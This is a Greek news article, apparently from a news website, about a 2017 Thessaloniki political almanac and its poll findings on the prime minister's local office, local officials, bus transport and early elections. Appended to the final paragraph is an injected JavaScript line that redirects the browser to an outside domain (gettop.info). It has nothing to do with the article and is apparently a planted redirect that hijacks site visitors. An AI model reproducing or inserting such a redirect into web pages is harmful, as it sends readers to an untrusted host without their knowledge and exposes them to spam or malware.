Οκτώ στους δέκα Θεσσαλονικείς θεωρούν άχρηστο το πρωθυπουργικό γραφείο στη Θεσσαλονίκη

0
13

 

To Σάββατο 7 Ιανουαρίου με την εφημερίδα «Μακεδονία της Κυριακής» κυκλοφορεί το «Πολιτικό Ημερολόγιο-Ατζέντα Θεσσαλονίκης» του δημοσιογράφου, Βαγγέλη Πλάκα για το 2017.

Μεταξύ των ερωτήσεων στις οποίες κλήθηκαν να απαντήσουν οι συμμετέχοντες στην έρευνα ήταν και το κατά πόσο θεωρούν χρήσιμη την ίδρυση πρωθυπουργικού γραφείου στη Θεσσαλονίκη. Το 83% των ερωτηθέντων απάντηση «όχι/ μάλλον όχι» και το 17% «ναι/ μάλλον ναι».

Σε άλλο σημείο της έρευνας, γράφει το thestival.gr, οι Θεσσαλονικείς καλούνται να βαθμολογήσουν τον δήμαρχο Θεσσαλονίκης, Γιάννη Μπουτάρη και τον περιφερειάρχη, Απόστολο Τζιτζικώστα και με τους δύο να λαμβάνουν πάνω από τη βάση.

Παράλληλα το 25% θέλει ο ΟΑΣΘ να παραμείνει ως έχει, το 28% να δοθεί η δυνατότητα και σε άλλους να παράγουν μεταφορικό έργο, το 17% θέλει οι αστικές συγκοινωνίες να περάσουν στα χέρια της αυτοδιοίκησης και το 30% θέλει κρατικοποίηση του Οργανισμού και καθαρά δημόσιες αστικές συγκοινωνίες.

Μεταξύ της φετινής ύλης περιλαμβάνεται ακόμα:

• «Η Θεσσαλονίκη στο πέρασμα από το 2016 στο 2017». Τι περιμένουμε στην πόλη το νέο έτος.

• Ανάλυση των Διεθνών Εξελίξεων σε ΗΠΑ, Ε.Ε., Τουρκία και Συρία και οι επιπτώσεις τους στην Ελλάδα μέσα από ανάλυση του Ινστιτούτου Διεθνών, Ευρωπαϊκών και Αμυντικών Αναλύσεων του ΠΑΜΑΚ. Γράφουν οι καθηγητές Η. Κουσκουβέλης, Γ. Σπυρόπουλος, Θ. Καρβουναράκης και η Δρ. Ρ. Παιδή.

• Το «Λεξικό της Κρίσης» με 100 λήμματα αγγλικών και ελληνικών όρων που μπήκαν στη ζωή μας από την οικονομική κρίση και τα Μνημόνια. Του καθηγητή του ΑΠΘ Γρ. Ζαρωτιάδη και της Υπ. Δρ. Ειρ. Οζούνη.

• «Ο πολιτικός και κοινωνικός λαϊκισμός στην εποχή της κρίσης», με άρθρα των καθηγητών του ΕΚΠΑ Γ. Στείρη, του ΑΠΘ Π. Δόικου και του υπ. Δρ. του ΑΠΘ Θ. Σιώμου

• «Η εξέλιξη των πολιτικών τάσεων το 2016», μέσα από τις έρευνες της Prorata, με την υπογραφή του καθηγητή του ΠΑΜΑΚ Γ. Κωνσταντινίδη

Και φέτος φιλοξενείται η ετήσια έρευνα της “Interview”, που περιλαμβάνει απόψεις των Θεσσαλονικέων για πολιτικά, οικονομικά και τοπικά ζητήματα. Μεταξύ άλλων:

• Το 42% τάσσεται υπέρ πρόωρων εκλογών, ενώ το 46% κατά.

• Το 28% θέλει μετά από τις εκλογές αυτοδύναμη κυβέρνηση, το 34% συνεργασίας και το 16% οικουμενική.

• Το 70% εκτιμά χειρότερη την οικονομική του κατάσταση σε σχέση με πριν από ένα έτος και το 26% ίδια.

Μεσοπρόθεσμος στόχος του “Πολιτικού Ημερολογίου” είναι και η δημιουργία ενός πολιτικού think tank για τη Θεσσαλονίκη. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here